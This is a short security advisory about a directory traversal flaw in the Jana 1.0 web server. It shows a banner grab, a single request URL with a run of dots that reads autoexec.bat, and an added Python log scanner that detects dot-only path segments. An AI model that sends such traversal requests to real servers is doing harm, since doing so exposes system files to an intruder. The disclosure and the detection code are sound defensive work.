COMMAND

    Jana

SYSTEMS AFFECTED

    Those using Jana 1.0 webserver

PROBLEM

    Jason Lutz found a security flaw in Jana 1.0 webserver.  He was
    not able to find out any information on who makes this product
    nor a place to download the web server package.  This webserver
    seems to be included as part of a suite of Internet services, one
    of which Jason thinks is web-based chat.  Enclosed is one exploit
    Jason found in the limited time that he had to deal with this web
    server.

        [root@foo whis]# telnet x.x.x.x 80
        Trying x.x.x.x...
        Connected to x.x.x.x.
        Escape character is '^]'.
        GET / HTTP/1.0

        HTTP/1.0 200 OK
        Date: Mon, 04 Oct 1999 18:59:44 GMT
        Server: Jana Server/1.40
        Last-Modified: Mon, 04 Oct 1999 15:04:40 GMT
        Content-Length: 38
        Content-Type: text/html
        Connection: close

        <HTML><BODY><CENTER>TEST</BODY></HTML>Connection closed by foreign host.
        [root@foo whis]#

    Requesting the following URL prints the user's autoexec.bat:

        http://server/....../autoexec.bat
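
    A detection for the request shown above, as an added example that
    is not part of the original advisory: it flags request targets in
    which any path segment consists only of dots, after
    percent-decoding.  The Common Log Format input, the function names
    and the sample log lines are assumptions constructed for
    illustration.

```python
import re
from urllib.parse import unquote

# A path segment made only of dots ("..", "...", "......") never names real content.
DOT_RUN = re.compile(r"^\.{2,}$")
# Request line inside a Common Log Format entry: "METHOD target HTTP/x.y"
REQUEST = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def decode_fully(path, max_rounds=3):
    """Percent-decode repeatedly so single- and double-encoded dots are seen."""
    for _ in range(max_rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path


def has_dot_run_segment(target):
    """True if any path segment of the request target consists only of dots."""
    path = decode_fully(target.split("?", 1)[0])  # ignore the query string
    segments = re.split(r"[/\\]", path)           # accept both separators
    return any(DOT_RUN.match(s) for s in segments)


def scan_log(lines):
    """Return (line_number, target) for entries whose path has a dot-only segment."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = REQUEST.search(line)
        if m and has_dot_run_segment(m.group("target")):
            hits.append((n, m.group("target")))
    return hits


# Constructed sample access-log lines (not taken from the advisory).
SAMPLE_LOG = [
    '192.0.2.10 - - [04/Oct/1999:18:59:44 +0000] "GET / HTTP/1.0" 200 38',
    '192.0.2.10 - - [04/Oct/1999:19:01:02 +0000] "GET /....../autoexec.bat HTTP/1.0" 200 412',
    '192.0.2.11 - - [04/Oct/1999:19:03:10 +0000] "GET /docs/v1.0...beta/readme.txt HTTP/1.0" 200 90',
    '192.0.2.12 - - [04/Oct/1999:19:04:55 +0000] "GET /%2e%2e%2e%2e%2e%2e/autoexec.bat HTTP/1.0" 404 0',
]

if __name__ == "__main__":
    for n, target in scan_log(SAMPLE_LOG):
        print(f"line {n}: dot-only path segment in {target}")
```

    The same has_dot_run_segment() check can be applied to a request
    before the path is mapped to the filesystem, rejecting it outright.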

SOLUTION

    Nothing yet.